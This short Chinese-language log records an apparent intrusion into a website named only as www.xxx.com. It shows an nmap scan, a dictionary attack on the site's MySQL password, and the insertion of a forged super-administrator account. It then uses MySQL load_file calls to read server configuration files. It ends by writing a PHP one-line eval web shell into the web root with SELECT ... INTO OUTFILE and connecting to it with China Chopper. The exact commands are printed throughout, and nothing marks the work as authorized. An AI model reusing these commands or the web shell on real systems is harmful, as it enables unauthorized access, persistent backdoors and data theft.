1 打开目标站点:www.xxx.com
2 注册账号并登录,大概找下注入点,没找到
3 用namp -A -T4 目标站点扫描开放的服务
发现mysql等
4 猜弱口令 + 字典 对mysql进行了破译 (运气较好,得到了密码)
5 连接到mysql 找到用户表,密码用md5加密,试了几个,解不出来,应该有加随机字符
于是复制了一个超级管理员,用户名及密码复制之前注册的账号
6 打开网站首页,登录,进入管理界面。没找到上传漏洞,也没发现物理路径。
7 在mysql 中尝试读取文件
select load_file('c:/windows/php.ini'); 结果为null
于是创建新表
create table datainfo (aaa text);
尝试读取文件到表中
load data infile 'php.ini' into table datainfo; 提示D:phpStudy4IISMySQLdatafactoryphp.ini not found
可以看出是用phpStudy4IIS创建的,于是下载一个phpStudy4IIS研究目录
select load_file('D:/phpStudy4IIS/tools/phpStudy.ini'); 发现网站根目录等
写入一句话
select '<?php @eval($_POST[cmd]); ?>' into outfile 'D:/phpStudy4IIS/WWW/include/xx.php';
用菜刀连接:www.xxx.com/include/xx.php cmd